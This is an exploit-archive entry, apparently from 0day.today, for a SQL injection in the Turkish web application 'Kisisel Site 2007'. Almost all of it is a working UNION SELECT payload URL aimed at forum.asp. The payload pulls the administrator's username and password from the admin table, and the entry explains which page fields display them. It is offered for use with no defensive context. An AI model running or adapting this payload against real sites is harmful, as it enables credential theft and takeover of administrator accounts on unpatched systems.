id: 1482
date: 02/06/2007
title: Kisisel Site 2007 (tr) Remote SQL Injection Vulnerability
author: cl24zy
cves: 

=========================================================
Kisisel Site 2007 (tr) Remote SQL Injection Vulnerability
=========================================================



###############################################################
#Ki.isel Site 2007 (tr) == SQL Injection Vulnerability
#Author : cl24zy
###############################################################

#Exploit;
#Admin Nick, Passport;
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin

#Union data Text;
#Konu Ba.l.klar. : Admin UserName
#Yazan : Admin Password

# iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################




#  0day.today [2023-03-25]  #